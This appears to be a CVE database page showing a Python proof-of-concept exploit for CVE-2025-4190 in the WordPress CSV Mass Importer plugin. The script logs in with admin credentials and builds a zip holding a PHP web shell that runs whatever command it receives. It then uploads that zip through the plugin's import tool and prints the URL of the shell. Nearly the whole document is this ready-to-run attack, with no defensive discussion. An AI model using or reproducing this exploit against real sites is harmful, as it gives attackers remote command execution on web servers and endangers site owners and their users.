4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-4190
README.md
Rendering markdown...
POC / CVE-2025-4190.py PY
⬇ Raw GitHub ✕ Close 
import argparse
import requests
import sys
import os
import zipfile
from urllib.parse import urljoin
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable SSL verification warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Exploit By : Nxploited (Khaled_alenazi)

def create_session():
    session = requests.Session()
    session.verify = False
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    })
    return session


def login(session, url, username, password):
    login_url = f"{url}/wp-login.php"
    data = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    response = session.post(login_url, data=data)
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("[+] Logged in successfully.")
        return True
    else:
        print("[-] Failed to log in.")
        return False


def prepare_payload():
    php_shell = "<?php system($_GET['cmd']); ?>"
    shell_filename = 'nxploited.php'
    zip_filename = 'nxploited.zip'

    with open(shell_filename, 'w') as f:
        f.write(php_shell)

    with zipfile.ZipFile(zip_filename, 'w') as zipf:
        zipf.write(shell_filename)

    os.remove(shell_filename)

    print(f"[+] Payload '{zip_filename}' created successfully.")
    return zip_filename


def upload_payload(session, url, zip_file):
    upload_url = f"{url}/wp-admin/tools.php?page=cmi-tool"

    with open(zip_file, 'rb') as f:
        files = {
            'cmi_import_upload': (zip_file, f, 'application/zip')
        }

        data = {
            'cmi_import_source': 'upload',
            'cmi_csv_delim': 'comma',
            'cmi_csv_separ': '2quote',
            'cmi_import_safe': '1'
        }

        headers = {
            "Referer": upload_url,
            "Origin": url,
            "Connection": "keep-alive",
            "Upgrade-Insecure-Requests": "1"
        }

        response = session.post(upload_url, files=files, data=data, headers=headers)

    if response.status_code == 200:
        print("[+] Payload uploaded successfully.")
        shell_path = urljoin(url, 'wp-content/uploads/cmi-data/nxploited.php')
        print(f"[+] Shell URL: {shell_path}")
        print("Exploited By Nxploited (Khaled_alenazi)")
    else:
        print(f"[-] Failed to upload payload. Status code: {response.status_code}")
        print(f"[-] Server response: {response.text}")


def main():
    parser = argparse.ArgumentParser(
        description="WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)"
    )
    parser.add_argument('--url', '-u', required=True, help='Target WordPress site URL')
    parser.add_argument('--username', '-un', required=True, help='WordPress admin username')
    parser.add_argument('--password', '-p', required=True, help='WordPress admin password')
    args = parser.parse_args()

    session = create_session()

    if not login(session, args.url, args.username, args.password):
        sys.exit(1)

    zip_file = prepare_payload()
    upload_payload(session, args.url, zip_file)


if __name__ == '__main__':
    main()